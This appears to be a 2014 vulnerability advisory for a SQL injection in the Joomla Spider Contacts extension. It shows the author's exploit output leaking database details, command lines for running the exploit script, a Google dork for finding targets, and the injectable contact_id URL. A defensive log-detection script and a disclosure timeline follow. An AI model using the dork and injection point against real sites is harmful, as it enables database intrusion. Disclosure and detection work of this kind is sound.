Joomla Spider Contacts 1.3.6 and below SQL Injection vulnerability

Joomla Spider Contacts

   $$$$$\                                   $$\                  $$$$$$\            $$\       $$\
   \__$$ |                                  $$ |                $$  __$$\           \__|      $$ |
      $$ | $$$$$$\   $$$$$$\  $$$$$$\$$$$\  $$ | $$$$$$\        $$ /  \__| $$$$$$\  $$\  $$$$$$$ | $$$$$$\   $$$$$$\
      $$ |$$  __$$\ $$  __$$\ $$  _$$  _$$\ $$ | \____$$\       \$$$$$$\  $$  __$$\ $$ |$$  __$$ |$$  __$$\ $$  __$$\
$$\   $$ |$$ /  $$ |$$ /  $$ |$$ / $$ / $$ |$$ | $$$$$$$ |       \____$$\ $$ /  $$ |$$ |$$ /  $$ |$$$$$$$$ |$$ |  \__|
$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ |$$ |$$  __$$ |      $$\   $$ |$$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |
\$$$$$$  |\$$$$$$  |\$$$$$$  |$$ | $$ | $$ |$$ |\$$$$$$$ |      \$$$$$$  |$$$$$$$  |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
 \______/  \______/  \______/ \__| \__| \__|\__| \_______|       \______/ $$  ____/ \__| \_______| \_______|\__|
                                                                          $$ |
                                                                          $$ |
                                                                          \__|
 $$$$$$\                       $$\                           $$\                       $$\       $$$$$$\      $$$$$$\
$$  __$$\                      $$ |                          $$ |                    $$$$ |     $$ ___$$\    $$  __$$\
$$ /  \__| $$$$$$\  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$$\ $$$$$$\    $$$$$$$\       \_$$ |     \_/   $$ |   $$ /  \__|
$$ |      $$  __$$\ $$  __$$\_$$  _|   \____$$\ $$  _____|\_$$  _|  $$  _____|        $$ |       $$$$$ /    $$$$$$$\
$$ |      $$ /  $$ |$$ |  $$ | $$ |     $$$$$$$ |$$ /        $$ |    \$$$$$$\          $$ |       \___$$\    $$  __$$\
$$ |  $$\ $$ |  $$ |$$ |  $$ | $$ |$$\ $$  __$$ |$$ |        $$ |$$\  \____$$\         $$ |     $$\   $$ |   $$ /  $$ |
\$$$$$$  |\$$$$$$  |$$ |  $$ | \$$$$  |\$$$$$$$ |\$$$$$$$\   \$$$$  |$$$$$$$  |      $$$$$$\ $$\$$$$$$  |$$\ $$$$$$  |
 \______/  \______/ \__|  \__|  \____/  \_______| \_______|   \____/ \_______/       \______|\__|\______/ \__|\______/

                                                                                         j00ml4 Spid3r C0nt4cts <= 1.3.6 SQLi

                                                     Written by:

                                                   Claudio Viviani

                                                http://www.homelab.it

                                                   info@homelab.it
                                               homelabit@protonmail.ch

                                          https://www.facebook.com/homelabit
                                            https://twitter.com/homelabit
                                         https://plus.google.com/+HomelabIt1/
                               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[+] Searching for Joomla Spider Contacts vulnerability...
[+]
[!] Boolean SQL injection vulnerability FOUND!
[+]
[+] Detection version in progress....
[+]
[+] EXTENSION VERSION: 1.3.6
[+]
[!] http://10.0.0.67 VULNERABLE!!!
[+]
[!] DB NAME : joomla
[!] DB VERS : 5.0.95
[!] DB USER : pippo@localhost

Exploit Usage

1) Joomla standard path:   http://localhost/index.php?option=com_spidercontacts
                           [user@localhost ~]$ python j00ml4_spider_contacts_136_sqli.py -H http://localhost

2) Joomla Custom path:     http://localhost/joomla/index.php?option=com_spidercontacts
                           [user@localhost ~]$ python j00ml4_spider_contacts_136_sqli.py -H http://localhost -b joomla

Download

Download: j00ml4_spider_contacts_136_sqli.py
          j00ml4_spider_contacts_136_sqli.py (Mega mirror)

Info

######################

# Exploit Title : Joomla Spider Contacts <= 1.3.6 SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://web-dorado.com/

# Software Link : http://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=60
#   Mirror Link : https://mega.co.nz/#!mJwlUahJ!fx7d1ZQszaD3-k66PjWQEBXQafJnEeRDEleN8jqbVOE

# Dork Google: inurl:option=com_spidercontacts

# Date : 2014-09-07

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://localhost/index.php?option=com_spidercontacts&contact_id=[SQLi]&view=showcontact&lang=ca

The "contact_id" request parameter is not sanitized before it is used in the SQL query.
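
Added example (not part of the original advisory or the author's script): a log check a defender can run to find requests to com_spidercontacts whose contact_id is not a plain integer, which is what a legitimate contact link carries. The combined log format, the sample lines and the function name are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Sep/2014:10:00:01 +0200] "GET /index.php?option=com_spidercontacts&contact_id=3&view=showcontact&lang=ca HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Sep/2014:10:00:07 +0200] "GET /joomla/index.php?option=com_spidercontacts&contact_id=3%27&view=showcontact&lang=ca HTTP/1.1" 200 812 "-" "python-requests"
10.0.0.9 - - [10/Sep/2014:10:00:08 +0200] "GET /index.php?option=com_content&id=7%27 HTTP/1.1" 200 900 "-" "python-requests"
"""

# Pulls the client address and the request target out of one log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_requests(log_text):
    """Return (client_ip, contact_id) pairs for com_spidercontacts requests
    whose contact_id is anything other than a short run of digits."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we can parse
        # parse_qs URL-decodes values, so encoded quotes/spaces become visible.
        params = parse_qs(urlsplit(match.group("target")).query,
                          keep_blank_values=True)
        if "com_spidercontacts" not in params.get("option", []):
            continue  # other components are out of scope for this check
        for value in params.get("contact_id", []):
            if not re.fullmatch(r"\d{1,10}", value):
                findings.append((match.group("ip"), value))
    return findings


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric contact_id: {value!r}")
```

The check only sees query strings, so requests that carry the parameter in a POST body need the same test applied at a WAF or in the application.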

######################

# Vulnerability Disclosure Timeline:

2014-09-07:  Discovered vulnerability
2014-09-09:  Vendor Notification
2014-09-10:  Vendor Response/Feedback
2014-09-10:  Vendor Fix/Patch
2014-09-10:  Public Disclosure
 
#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
        

#####################